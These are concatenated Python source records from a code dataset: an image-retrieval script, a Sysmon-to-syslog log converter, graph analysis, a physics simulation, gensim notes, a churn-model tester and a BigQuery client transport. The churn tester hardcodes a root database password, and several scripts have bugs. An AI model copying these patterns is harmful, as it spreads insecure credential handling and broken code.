new_similarity_score_list.reshape(-1)\n new_ranked_list = []\n for i in range(len(new_similarity_score_list)):\n sim = new_similarity_score_list[i]\n u, v, w = similarity_list[i]\n new_ranked_list.append((u, v, sim))\n new_ranked_list = sorted(new_ranked_list, key=lambda x: x[2], reverse=True)\n similarity_list = new_ranked_list\n\n print_ranked_results(similarity_list, relevant_set)\n\n provide_rel_feedback = input(\"Do you want to provide relevance feedback? [Enter 'yes' or 'no']\\n\")\n\n if 'yes' in provide_rel_feedback:\n # get user input for relevant and irrelevant images\n # relevant_set += input_rel_irrelevant_image_ids()\n # irrelevant_set += input_rel_irrelevant_image_ids(is_relevant=False)\n relevant_set_temp, _ = input_rel_irrelevant_image_ids() # is a list of image_id's\n relevant_set += relevant_set_temp\n irrelevant_set_temp, relevant_set = input_rel_irrelevant_image_ids(is_relevant=False,\n relevant_set=relevant_set)\n irrelevant_set += irrelevant_set_temp\n\n\nif __name__ == \"__main__\":\n run_task()","sub_path":"Code/task6.py","file_name":"task6.py","file_ext":"py","file_size_in_byte":37113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"453788422","text":"import json\n\ndef convertEvents(sysmon):\n for event in sysmon:\n if \"Microsoft-Windows-Sysmon\" in event:\n event = json.loads(event)\n \n m = event[\"message\"]\n m = m.replace(\"\\n\", \" \")\n \n if \"computer_name\" in event:\n h = event[\"computer_name\"]\n elif \"winlog\" in event:\n h = event[\"winlog\"][\"computer_name\"]\n else:\n h = \"NOHOSTNAME\"\n\n x = f\"<14>Jan 01 00:00:00 {h} Microsoft-Windows-Sysmon[2092]: {m}\"\n print(x)\n\nwith open('./caldera_attack_evals_round1_day1_2019-10-20201108.json','r') as sysmon:\n convertEvents(sysmon)\n\nwith open('./empire_apt3_2019-05-14223117.json','r') as sysmon:\n convertEvents(sysmon)","sub_path":"listings/sysmon-to-syslog.py","file_name":"sysmon-to-syslog.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"269815482","text":"import tool.util as util\nimport networkx as nx\nimport os\nimport copy\nfrom collections import Counter\n\nglobal keyword\ndef variance(l): # 平方-期望的平方的期望\n ex = float(sum(l)) / len(l)\n s = 0\n for i in l:\n s += (i - ex) ** 2\n return float(s) / len(l)\n\n\n# 计算边数存在率,g2是固定的大图\ndef cal_existed_edges_ratio(g1, g2, type):\n g1.remove_node(keyword)\n g2.remove_node(keyword)\n ngs = set(g1.nodes())\n ngs1 = set(g2.nodes())\n ngs2 = ngs & ngs1\n\n # 计算每个月的网络\n ngs = ngs - ngs2\n init_edge_num = len(g1.edges())\n for n in ngs:\n g1.remove_node(n)\n\n extra_node_edge = init_edge_num-len(g1.edges())\n\n # 计算总网络\n ngs1 = ngs1 - ngs2\n for n in ngs1:\n g2.remove_node(n)\n\n g3 = nx.difference(g1, g2)\n # 计算保留率\n r = 1-(len(g3.edges())+extra_node_edge) / init_edge_num\n print(r)\n return r\n\n# 计算最大k-core保留比例\ndef max_k_shell(g1, g2):\n g2 = nx.k_core(g2)\n g1 = nx.k_core(g1)\n\n s1 = set(g1.nodes())\n s2 = set(g2.nodes())\n s3 = s1 & s2\n\n print(str(len(s3)/len(s1)))\n print(str(len(s3)/len(s2)))\n return len(s3)/len(s1), len(s3)/len(s2)\n\n\n# 计算共同节点数在两个图之间的度分布\ndef same_node_degree(g1, g2):\n g2.remove_edges_from(g2.selfloop_edges())\n g1.remove_edges_from(g1.selfloop_edges())\n s1 = set(g1.nodes())\n s2 = set(g2.nodes())\n s3 = s2 - s1\n ns_list = []\n temp_list = []\n for node in s3:\n ns1 = g2.neighbors(node)\n cc = 0\n for n in ns1:\n if n in s1:\n cc += 1\n ns_list.append(cc)\n if cc == 5:\n temp_list.append(node)\n dd = nx.core_number(g2)\n tt_list = []\n for temp_word in temp_list:\n tt_list.append(dd[temp_word])\n if len(tt_list) > 0:\n print(len(tt_list),end=\"\\t\")\n print(sum(tt_list)/len(tt_list),end=\"\\t\")\n print(variance(tt_list))\n r_dict = Counter(ns_list)\n r_list = list(range(max(r_dict.keys())+1))\n for k,v in r_dict.items():\n r_list[k] = v\n return r_list\n\n\ndef calculate_existed_ratio(g1, g2, type):\n gg = nx.k_core(g1)\n s1 = set(gg.nodes())\n s2 = set(g2.nodes())\n s3 = s1 & s2\n # return str(len(s1)) + \"\\t\" + str(len(s3))\n return str(len(s3)/len(s1))\n\n# 计算最大公共子图的比率\n# pkl_dir: pkl 所在的目录\n# mcs_dir: 结果生成的目录\n# is_front: 是否跟前面的比较\n# key_word:关键词\n# lap: 步长\ndef loop_compare(com_function, keyword_list, pkl_dir1, result_dir, mode=1, lap=1, type=\"pkl\"):\n for key in keyword_list:\n global keyword\n keyword = key\n print(key)\n if mode == 0:\n util.create_directory(result_dir + key + \"//\")\n pkl_dir = pkl_dir1.format(key)\n f_list = util.get_file_list(pkl_dir, '.pkl')\n os.chdir(pkl_dir)\n result_list = []\n # 升序排序\n nw_list = sorted(f_list)\n ii = len(nw_list)-1\n\n while ii - 2*lap >= 0:\n g2 = util.get_nw(nw_list[ii])\n # 迭代生成子图\n # k = 1\n # while k < lap:\n # g2 = nx.compose(g2, util.get_nw(nw_list[ii - k]))\n # k += 1\n\n ii -= lap\n g1 = util.get_nw(nw_list[ii])\n # 迭代生成子图\n # k = 1\n # while k < lap:\n # g1 = nx.compose(g1, util.get_nw(nw_list[ii - k]))\n # k += 1\n\n # 生成连通子图\n # 相互比例\n if mode == 1:\n r1, r2 = com_function(copy.deepcopy(g1), copy.deepcopy(g2))\n result_list.append(nw_list[ii + lap][0:-4] + \"\\t\" + str(r1))\n result_list.append((nw_list[ii][0:-4] + \"\\t\" + str(r2)))\n # 一对一\n elif mode == 0:\n result_list = com_function(copy.deepcopy(g1), copy.deepcopy(g2))\n util.save_file(result_dir + key + \"//\" + nw_list[ii + lap][0:-4] + \".txt\", result_list)\n # n对一\n elif mode == 2:\n r1 = com_function(copy.deepcopy(g1), copy.deepcopy(g2), type)\n result_list.append(nw_list[ii + lap][0:-4] + \"\\t\" + str(r1))\n\n ii -= lap\n if mode != 0:\n result_list.reverse()\n util.save_file(result_dir+key+\".txt\", result_list)\n\n\n\nkey_list = util.get_key_list()+util.get_key_list2()\npkl_dir = r\"D:\\semantic analysis\\新结果\\去虚词去单字\\合成共现网络\\{0}\\p//\"\n# pkl_dir = r\"D:\\semantic analysis\\新结果\\合并图\\{0}//\"\nresult_dir = r\"D:\\semantic analysis\\新结果\\去虚词去单字\\半年间边变化率//\"\n# result_dir = r\"D:\\semantic analysis\\新结果\\合并图\\扯淡//\"\nloop_compare(cal_existed_edges_ratio, key_list, pkl_dir, result_dir, 2, 5)\n# loop_compare(same_node_degree, key_list, pkl_dir, result_dir, 0)\n\n\n","sub_path":"calculate/graph/cal_core_mcs.py","file_name":"cal_core_mcs.py","file_ext":"py","file_size_in_byte":4895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"336849147","text":"#practica 4\n#ejercicio 2 Pida al usuario 5 números y diga si estos estaban en orden decreciente, creciente o desordenados.\n\nprint('Escribe 5 numeros')\nprimero=input ()\nsegundo=input ()\ntercero=input ()\ncuarto=input ()\nquinto=input ()\nif primero<=segundo and segundo<=tercero and tercero<=cuarto and cuarto<=quinto:\n print ('Los numeros estan en orden creciente')\nelse:\n if quinto<=cuarto and cuarto<=tercero and tercero<=segundo and segundo<=primero:\n print ('Los numeros estan en orden decreciente')\n else:\n print ('Los numeros estan desordenados')\n \n","sub_path":"Python/Practica4/Practica4ej2.py","file_name":"Practica4ej2.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"243183913","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\n\nimport BScode\nimport LFcode\nimport animate\nimport plot\n\n#####\n#\n# The Initial Conditions\n#\n#####\n\n#General\nalpha = 0.02\nL = 20\nh_div = 200\ndx = L/h_div\ndt = dx/10\n\n#Lax-Friedrichs Model\ncenter = 5\nkpeak = 1.35#3.5\neta0 = [np.exp(-.5*(x-center)**2)+1 for x in np.arange(0,L,dx)]\nk0 = [kpeak*np.exp(-.5*(x-center)**2)+1 for x in np.arange(0,L,dx)]\n\n#Verlet\nkmin = 2.4 #2.5\nkmax = 100 # 10 (doesn't mean anything for getk_d)\ndk = kmin*1\ng = 0\nm = 1\ngamma = 0.1 #0.1\na0 = (L/h_div)/5\n\nLFsteps = 100\nBSsteps = 300 #1000\n\n\n#####\n#\n# The Code\n#\n#####\n\neta,xyeta,v,xyv = LFcode.doLF(alpha,L,dx,dt,LFsteps,eta0,k0,True)\n\nin_x0 = xyeta[LFsteps-1]\nin_xm1 = xyeta[LFsteps-2]\n\nin_v0 = v[LFsteps-1]\nx0 = BScode.data_to_pairs(in_x0)\nxm1 = BScode.data_to_pairs(in_xm1)\nv0 = np.array([[v,0] for v in in_v0])\n\n\n\nBSdt= dt*2\n\nspring_data,energy = BScode.verlet(x0,xm1,v0,BScode.acceleration,a0,m,kmin,kmax,dk,alpha,gamma,dt,BSdt,BSsteps,False)\n\n#Format the verlet data to the lax-friedrichs format\ndata_fmt = []\nfor t in spring_data:\n xout = []\n yout = []\n for d in t:\n xout.append(d[0])\n yout.append(d[1])\n data_fmt.append([xout,yout])\n\n\"\"\"\n\nx = [2.53240, 1.91110, 1.18430, 0.95784, 0.33158,\n -0.19506, -0.82144, -1.64770, -1.87450, -2.2010]\n\ny = [-2.50400, -1.62600, -1.17600, -0.87400, -0.64900,\n -0.477000, -0.33400, -0.20600, -0.10100, -0.00600]\n\ncoefficients = polyfit(x, y, 6)\npolynomial = poly1d(coefficients)\nxs = arange(-2.2, 2.6, 0.1)\nys = polynomial(xs)\n\nplot(x, y, 'o')\nplot(xs, ys)\nylabel('y')\nxlabel('x')\nshow()\n\"\"\"\n\n#combine the data\nfull_data = []\nfor time in xyeta:\n x = []\n for pos in time[0]:\n x.append(pos)\n y = []\n for pos in time[1]:\n y.append(pos)\n full_data.append([x,y])\n\nfor time in data_fmt:\n x = []\n for pos in time[0]:\n x.append(pos)\n y = []\n for pos in time[1]:\n y.append(pos)\n full_data.append([x,y])\n\n\"\"\"\nfor t in full_data:\n y = t[1]\n print(max(y))\n\"\"\"\nbreak_dat = full_data[250]\npeak_h = max(break_dat[1])\ni = 0\nwhile i < len(break_dat[1]):\n if break_dat[1][i] == peak_h:\n print(i)\n peak_i = i\n i += 1\nprint(break_dat[0][peak_i],break_dat[1][peak_i])\n\n#####\n#\n# The Animation\n#\n#####\nvideo_length = 7\nanimate.animate(alpha,L,dx,dt,full_data,video_length,True)\n\nshow_frame = False\n\n#print(np.array(data))\n\nif show_frame:\n # Max of 4 frames (for more add colors and linestyles)\n print(\"Loading Image...\")\n frames = [250,275,300]\n #xvals = [i for [i,j] in indata]\n #yvals = [j for [i,j] in indata]\n #scatter(xvals,yvals,'$x$','$h$',None,False)\n i = 0\n out = []\n while i < len(frames):\n index = frames[i]\n d = full_data[index]\n xs = []\n ys = []\n out.append(d)\n \"\"\"\n for [x,y] in d:\n xs.append(x)\n ys.append(y)\n out.append(np.array([np.array(xs),np.array(ys)]))\n \"\"\"\n i += 1\n plot.plot_frame(out,None,alpha,L,xlabel='$q$',ylabel='$\\eta$',title='')","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":3096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"590106028","text":"# 1.Creating and querying a corpus with gensim\r\n# Sample Data\r\narticles = [['uses',\r\n 'file',\r\n 'operating',\r\n 'system',\r\n 'placement',\r\n 'software',\r\n '.svg|thumb|upright|a',\r\n 'diagram']]\r\n\r\n# Import Dictionary\r\nfrom gensim.corpora.dictionary import Dictionary\r\n\r\n# Create a Dictionary from the articles: dictionary\r\ndictionary = Dictionary(articles)\r\n\r\n# Select the id for \"file\": computer_id\r\nfile_id = dictionary.token2id.get(\"file\")\r\n\r\n# Use computer_id with the dictionary to print the word\r\nprint(dictionary.get(file_id))\r\n\r\n# Create a MmCorpus: corpus\r\ncorpus = [dictionary.doc2bow(article) for article in articles]\r\n\r\n# Print the first 10 word ids with their frequency counts from the fifth document\r\nprint(corpus[4][:10])\r\n\r\n# 2.Gensim bag-of-words\r\n# Save the fifth document: doc\r\ndoc = corpus[4]\r\n\r\n# Sort the doc for frequency: bow_doc\r\nbow_doc = sorted(doc, key=lambda w: w[1], reverse=True)\r\n\r\n# Print the top 5 words of the document alongside the count\r\nfor word_id, word_count in bow_doc[:5]:\r\n print(dictionary.get(word_id), word_count)\r\n\r\n# Create the defaultdict: total_word_count\r\ntotal_word_count = defaultdict(int)\r\nfor word_id, word_count in itertools.chain.from_iterable(corpus):\r\n total_word_count[word_id] += word_count\r\n\r\n# Create a sorted list from the defaultdict: sorted_word_count\r\nsorted_word_count = sorted(total_word_count.items(), key=lambda w: w[1], reverse=True)\r\n\r\n# Print the top 5 words across all documents alongside the count\r\nfor word_id, word_count in sorted_word_count[:5]:\r\n print(dictionary.get(word_id), word_count)\r\n\r\n# 3.Tf-iDf with Wikipedia\r\n\r\n# Notes:\r\n# Formula: w = tf * log(N/df)\r\n# w - tf-idf weight for token i in document j\r\n# tf - number of occurences of token i in document j\r\n# df - number of documents that contain token i\r\n# N - total number of documents\r\n\r\n# Example: You want to calculate the tf-idf weight for the word \"computer\", which appears five times in a document containing 100 words. Given a corpus containing 200 documents, with 20 documents mentioning the word \"computer\", tf-idf can be calculated by multiplying term frequency with inverse document frequency.\r\n# Formula: w = (5 / 100) * log(200 / 20)\r\n\r\n# Import TfidfModel\r\nfrom gensim.models.tfidfmodel import TfidfModel\r\n\r\n# Create a new TfidfModel using the corpus: tfidf\r\ntfidf = TfidfModel(corpus)\r\n\r\n# Calculate the tfidf weights of doc: tfidf_weights\r\ntfidf_weights = tfidf[doc]\r\n\r\n# Print the first five weights\r\nprint(tfidf_weights[:5])\r\n\r\n# Sort the weights from highest to lowest: sorted_tfidf_weights\r\nsorted_tfidf_weights = sorted(tfidf_weights, key=lambda w: w[1], reverse=True)\r\n\r\n# Print the top 5 weighted words\r\nfor term_id, weight in sorted_tfidf_weights[:5]:\r\n print(dictionary.get(term_id), weight)\r\n\r\n\r\n","sub_path":"Natural Language Processing Fundamentals in Python/2_2_Introduction_to_gensim.py","file_name":"2_2_Introduction_to_gensim.py","file_ext":"py","file_size_in_byte":2776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"189481413","text":"import os\r\nimport requests\r\nimport pandas as pd\r\nimport numpy as np \r\nimport matplotlib.pyplot as plt \r\nimport seaborn as sns\r\nimport sqlalchemy\r\nfrom sklearn.preprocessing import LabelEncoder\r\nfrom sklearn.preprocessing import MinMaxScaler\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.metrics import confusion_matrix, accuracy_score\r\nfrom sklearn.model_selection import cross_val_predict \r\nfrom imblearn.combine import SMOTETomek\r\nimport json \r\n\r\nclass testing():\r\n def __init__(self, original_data, webappdata):\r\n self.availdata = original_data\r\n self.webappdata = webappdata\r\n def get_data(self): \r\n # data from MySQL Database\r\n #https://dev.to/fpim/object-oriented-design-architecture-with-panda-me4 ### Reference for data cleaning and making perfect data\r\n \r\n ### Have an Connection to Database\r\n engine = sqlalchemy.create_engine('mysql+pymysql://root:idntknwpassword#404@localhost:3306/churnapp')\r\n avail_df = pd.read_sql_table(self.availdata, engine)\r\n app_df = pd.read_sql_table(self.webappdata, engine)\r\n \r\n raw_data = pd.concat([avail_df, app_df], axis=0)\r\n\r\n return raw_data\r\n \r\n def preprocess_input(self):\r\n \r\n raw_data = self.get_data()\r\n\r\n df = pd.read_csv(raw_data)\r\n\r\n all_features = df.columns\r\n \r\n ### Make the Total Charges to a Numeric Value\r\n df['TotalCharges'] = pd.to_numeric(df['TotalCharges'], downcast='integer', errors='coerce')\r\n\r\n ### Since the Data is Skewed\r\n numerical_feature = [feature for feature in df.columns if df[feature].dtypes!=\"O\"]\r\n numerical_feature.remove('SeniorCitizen')\r\n for feature in numerical_feature:\r\n df[feature] = np.log(df[feature])\r\n\r\n ### Picking up Categorical Variables\r\n categoircal_features = [feature for feature in all_features if feature not in numerical_feature + 'customerID' + 'Churn']\r\n \r\n ### Handling Rare Categorical Variables\r\n categoircal_features.remove(\"TotalCharges\")\r\n for feature in categoircal_features:\r\n data = df.copy()\r\n data[\"Churn\"] = np.where((data[\"Churn\"]==\"Yes\"),1,0)\r\n temp = df.groupby(feature)[\"Churn\"].count()/len(data) #Collecting the Total Values\r\n temp_df = temp[temp>0.01].index # Values Greater that .01% index are Noted\r\n df[feature] = np.where(df[feature].isin(temp_df), df[feature], \"Rare_var\") # Replacing rare Variables\r\n \r\n \r\n ### Transforming the Categorical Variables into Labels\r\n # Lets do with Label Encoding since there is no Cardinality\r\n categoircal_features.append(\"Churn\")\r\n data = df[categoircal_features] \r\n df.drop(categoircal_features, axis=1, inplace=True) #Dropping Categorical Vairables\r\n data = data.apply(LabelEncoder().fit_transform) # Transforming the characters to Labels\r\n \r\n ### Concating the Whole Dataset into a Single Data\r\n df = pd.concat([df,data], axis=1)\r\n \r\n ### Scaling the Value \r\n scaling_feature = [feature for feature in all_features if feature not in [\"customerID\", \"Churn\"]]\r\n\r\n # Since the Columns Tenure has infinte Values in it\r\n df.replace([np.inf, -np.inf], 0, inplace=True) # Replacing inf values with 0\r\n\r\n ### fitting the values to Scaler function\r\n scaler=MinMaxScaler()\r\n scaler.fit(df[scaling_feature])\r\n df = pd.concat([df[[\"customerID\", \"Churn\"]].reset_index(drop=True),\r\n pd.DataFrame(scaler.transform(df[scaling_feature]), columns=scaling_feature)],\r\n axis=1)\r\n ### Arranging the Columns with respet to dataset\r\n df=df[[feature for feature in data.columns]]\r\n\r\n return df \r\n\r\n def data_testing(self):\r\n\r\n dataframe = self.preprocess_input()\r\n\r\n # read the processed data\r\n df = pd.read_csv(dataframe)\r\n\r\n # Taking only the selected Features\r\n selected_features = [\"Contract\", \"OnlineSecurity\", \"TechSupport\", \"tenure\", \"MonthlyCharges\", \"SeniorCitizen\", \"Dependents\", \"Churn\"]\r\n df = df[selected_features]\r\n\r\n # Dependent and Independent Variables Split up\r\n X = df.drop(\"Churn\", axis=1)\r\n Y = df[\"Churn\"]\r\n\r\n # RandomForestClassifier Model\r\n clf = RandomForestClassifier()\r\n yhat = cross_val_predict(clf, X, Y, cv=5)\r\n\r\n acc = np.mean(yhat== Y)\r\n tn, fp, fn, tp = confusion_matrix(Y, yhat).ravel()\r\n specificity = tn / (tn+fp)\r\n sensitivity = tp / (tp + fn)\r\n\r\n # Let's visualize within several slices of the dataset\r\n score = yhat == Y \r\n score_int = [int(s) for s in score]\r\n df['pred_accuracy'] = score_int\r\n\r\n # Bar plot by region\r\n\r\n sns.set_color_codes(\"dark\")\r\n ax = sns.barplot(x=\"region\", y=\"pred_accuracy\", data=df, palette = \"Greens_d\")\r\n ax.set(xlabel=\"Region\", ylabel = \"Model accuracy\")\r\n figure = plt.savefig(\"by_region.png\",dpi=80)\r\n\r\n # Now print to file\r\n with open(\"metrics.json\", 'w') as outfile:\r\n json.dump({ \"accuracy\": acc, \"specificity\": specificity, \"sensitivity\":sensitivity}, outfile)\r\n\r\n return outfile, figure\r\n\r\n \r\n\r\n\r\n","sub_path":"pytesting.py","file_name":"pytesting.py","file_ext":"py","file_size_in_byte":5558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"554948846","text":"import csv\n\nfrom django.core.management.base import BaseCommand\n\nfrom categories.models import Category\nfrom channels.models import Channel\n\n\nclass Command(BaseCommand):\n help = 'Import categories from csv file from given channel'\n\n def add_arguments(self, parser):\n parser.add_argument('channel', help='Channel name')\n parser.add_argument('file', help='CSV file with categories tree')\n\n def handle(self, *args, **options):\n channel, created = Channel.objects.get_or_create(name=options['channel'])\n count = 0\n\n if created is False:\n self.stdout.write(f'\\nDeleting categories from {channel.name}.\\n\\n')\n Category.objects.filter(channel=channel).delete()\n\n with open(options['file']) as file:\n csv_file = csv.reader(file)\n\n for row in csv_file:\n categories_list = row[0].split(' / ')\n count += Category.import_categories(channel, categories_list)\n\n self.stdout.write(f'\\n{count} categories processed!')\n","sub_path":"work-at-olist/core/management/commands/import_categories.py","file_name":"import_categories.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"156851028","text":"import json\nimport os\nimport glob\n\njson_files_path = glob.glob(os.path.join(\"C:\", os.sep, \"output\", \"game\", \"info\", \"*.json\"))\n# output_csv_file_path = os.path.join(\"C:\", os.sep, \"output\", \"edit\", \"info\", \"20mins_or_less.csv\")\noutput_csv_file_path = os.path.join(\"C:\", os.sep, \"output\", \"edit\", \"info\", \"more_then_20mins.csv\")\n\n# しばらく決め打ち\nSMITE_SPELL_ID = 11\nSOLO_DUO_Q = 420\nTWENTY_MINUTE_SECONDS = 1200\n\nwith open(output_csv_file_path, 'w') as csv_f:\n\n tmp = \"\"\n for i in range(5):\n tmp += \",championId{0},role{0},lane{0},haveSmite{0}\".format(i)\n\n # 項目名の出力\n csv_f.write(tmp[1:])\n csv_f.write(\"\\n\")\n\n # 1試合づつ読み込み\n for json_file_path in json_files_path:\n game_id, ext = os.path.splitext(os.path.basename(json_file_path))\n\n with open(json_file_path, 'r') as f:\n json_data = json.load(f)\n\n # ランク戦のみ取り込んでいるはずが、チュートリアルのデータも入ってる\n # 不要なので、読み飛ばす\n if json_data['queueId'] != SOLO_DUO_Q:\n # print(\"{0} is skipped\".format(game_id))\n continue\n\n # 試合時間20分以下のデータは扱わない\n if json_data['gameDuration'] <= TWENTY_MINUTE_SECONDS:\n\n # 試合時間20分超のデータは扱わない\n # if json_data['gameDuration'] > TWENTY_MINUTE_SECONDS:\n continue\n\n print(game_id, json_data['gameDuration'])\n\n participants = json_data['participants']\n\n participants_of_match = {}\n cnt = 0\n\n for participant in participants:\n # print(participant[\"participantId\"])\n # tmp_participant = OrderedDict()\n\n tmp_participant = {}\n\n tmp_participant['participantId'] = participant[\"participantId\"]\n tmp_participant['championId'] = participant[\"championId\"]\n tmp_participant['role'] = participant[\"timeline\"][\"role\"]\n tmp_participant['lane'] = participant[\"timeline\"][\"lane\"]\n\n if participant[\"spell1Id\"] == SMITE_SPELL_ID or participant[\"spell2Id\"] == SMITE_SPELL_ID:\n tmp_participant[\"smite\"] = 1\n\n else:\n tmp_participant[\"smite\"] = 0\n\n participants_of_match[participant[\"participantId\"]] = tmp_participant\n\n tmp = \"\"\n for i in range(0, 2):\n # print(i)\n\n # 1-5, 6-10と1チーム5人ずつ設定し、出力する\n for x in range(i * 5 + 1, i * 5 + 6):\n tmp += ',{championId},{role},{lane},{smite},{support_item}'.format(championId=participants_of_match[x][\"championId\"],\n role=participants_of_match[x][\"role\"],\n lane=participants_of_match[x][\"lane\"],\n smite=participants_of_match[x][\"smite\"])\n # 異常ケースを含むチームがあるかどうかのざっくり目視確認\n # print(tmp)\n\n csv_f.write(tmp[1:])\n csv_f.write(\"\\n\")\n tmp = \"\"\n\nprint(\"ended\")\n","sub_path":"python/identifyRoles/data_wrangling/automatic_detected_role/preprocessing/not_used/outputMatchesInfoCsv.py","file_name":"outputMatchesInfoCsv.py","file_ext":"py","file_size_in_byte":3379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"119800441","text":"# -*- coding: utf-8 -*-\n\n# Copyright 2020 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\nimport abc\nimport typing\n\nfrom google import auth\nfrom google.auth import credentials # type: ignore\n\nfrom google.cloud.bigquery.reservation_v1.types import reservation\nfrom google.cloud.bigquery.reservation_v1.types import reservation as gcbr_reservation\nfrom google.protobuf import empty_pb2 as empty # type: ignore\n\n\nclass ReservationServiceTransport(metaclass=abc.ABCMeta):\n \"\"\"Abstract transport class for ReservationService.\"\"\"\n\n AUTH_SCOPES = (\n \"https://www.googleapis.com/auth/bigquery\",\n \"https://www.googleapis.com/auth/cloud-platform\",\n )\n\n def __init__(\n self,\n *,\n host: str = \"bigqueryreservation.googleapis.com\",\n credentials: credentials.Credentials = None,\n ) -> None:\n \"\"\"Instantiate the transport.\n\n Args:\n host (Optional[str]): The hostname to connect to.\n credentials (Optional[google.auth.credentials.Credentials]): The\n authorization credentials to attach to requests. These\n credentials identify the application to the service; if none\n are specified, the client will attempt to ascertain the\n credentials from the environment.\n \"\"\"\n # Save the hostname. Default to port 443 (HTTPS) if none is specified.\n if \":\" not in host:\n host += \":443\"\n self._host = host\n\n # If no credentials are provided, then determine the appropriate\n # defaults.\n if credentials is None:\n credentials, _ = auth.default(scopes=self.AUTH_SCOPES)\n\n # Save the credentials.\n self._credentials = credentials\n\n @property\n def create_reservation(\n self\n ) -> typing.Callable[\n [gcbr_reservation.CreateReservationRequest], gcbr_reservation.Reservation\n ]:\n raise NotImplementedError\n\n @property\n def list_reservations(\n self\n ) -> typing.Callable[\n [reservation.ListReservationsRequest], reservation.ListReservationsResponse\n ]:\n raise NotImplementedError\n\n @property\n def get_reservation(\n self\n ) -> typing.Callable[[reservation.GetReservationRequest], reservation.Reservation]:\n raise NotImplementedError\n\n @property\n def delete_reservation(\n self\n ) -> typing.Callable[[reservation.DeleteReservationRequest], empty.Empty]:\n raise NotImplementedError\n\n @property\n def update_reservation(\n self\n ) -> typing.Callable[\n [gcbr_reservation.UpdateReservationRequest], gcbr_reservation.Reservation\n ]:\n raise NotImplementedError\n\n @property\n def create_capacity_commitment(\n self\n ) -> typing.Callable[\n [reservation.CreateCapacityCommitmentRequest], reservation.CapacityCommitment\n ]:\n raise NotImplementedError\n\n @property\n def list_capacity_commitments(\n self\n ) -> typing.Callable[\n [reservation.ListCapacityCommitmentsRequest],\n reservation.ListCapacityCommitmentsResponse,\n ]:\n raise NotImplementedError\n\n @property\n def get_capacity_commitment(\n self\n ) -> typing.Callable[\n [reservation.GetCapacityCommitmentRequest], reservation.CapacityCommitment\n ]:\n raise NotImplementedError\n\n @property\n def delete_capacity_commitment(\n self\n ) -> typing.Callable[[reservation.DeleteCapacityCommitmentRequest], empty.Empty]:\n raise NotImplementedError\n\n @property\n def update_capacity_commitment(\n self\n ) -> typing.Callable[\n [reservation.UpdateCapacityCommitmentRequest], reservation.CapacityCommitment\n ]:\n raise NotImplementedError\n\n @property\n def split_capacity_commitment(\n self\n ) -> typing.Callable[\n [reservation.SplitCapacityCommitmentRequest],\n reservation.SplitCapacityCommitmentResponse,\n ]:\n raise NotImplementedError\n\n @property\n def merge_capacity_commitments(\n self\n ) -> typing.Callable[\n [reservation.MergeCapacityCommitmentsRequest], reservation.CapacityCommitment\n ]:\n raise NotImplementedError\n\n @property\n def create_assignment(\n self\n ) -> typing.Callable[[reservation.CreateAssignmentRequest], reservation.Assignment]:\n raise NotImplementedError\n\n @property\n def list_assignments(\n self\n ) -> typing.Callable[\n [reservation.ListAssignmentsRequest], reservation.ListAssignmentsResponse\n ]:\n raise NotImplementedError\n\n @property\n def delete_assignment(\n self\n ) -> typing.Callable[[reservation.DeleteAssignmentRequest], empty.Empty]:\n raise NotImplementedError\n\n @property\n def search_assignments(\n self\n ) -> typing.Callable[\n [reservation.SearchAssignmentsRequest], reservation.SearchAssignmentsResponse\n ]:\n raise NotImplementedError\n\n @property\n def move_assignment(\n self\n ) -> typing.Callable[[reservation.MoveAssignmentRequest], reservation.Assignment]:\n raise NotImplementedError\n\n @property\n def get_bi_reservation(\n self\n ) -> typing.Callable[\n [reservation.GetBiReservationRequest], reservation.BiReservation\n ]:\n raise NotImplementedError\n\n @property\n def update_bi_reservation(\n self\n ) -> typing.Callable[\n [reservation.UpdateBiReservationRequest], reservation.BiReservation\n ]:\n raise NotImplementedError\n\n\n__all__ = (\"ReservationServiceTransport\",)\n","sub_path":"google/cloud/bigquery/reservation_v1/services/reservation_service/transports/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":6102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"381696271","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport csv\n\nfrom os.path import join\nfrom .word import Word\n\n\ndef print_and_get_file_list(path, verbose=True):\n \"\"\"\n Print all files in target path\n :param path: target path\n :param verbose: if true, print file list\n :return: file list\n \"\"\"\n file_list = list()\n\n idx = 1\n for root_path, dirs, files in os.walk(path):\n depth = root_path.replace(path, '').count(os.sep)\n indent = ' ' * 1 * depth\n if verbose:\n print('%s%s/' % (indent, root_path))\n child_indent = ' ' * 1 * (depth + 1)\n for f in files:\n if verbose:\n print('%s- %d. %s' % (child_indent, idx, f))\n file_list.append(join(root_path, f))\n idx += 1\n\n return file_list\n\n\ndef read_csv(file):\n \"\"\"\n Read word file csv, and store it into a list\n :param file: target word file\n :return: word list\n \"\"\"\n file = open(file, 'r', encoding='utf-8')\n word_list = []\n reader = csv.reader(file)\n for line in reader:\n word_param = {}\n try:\n word_param['word'] = line[0]\n except IndexError:\n word_param['word'] = ''\n\n 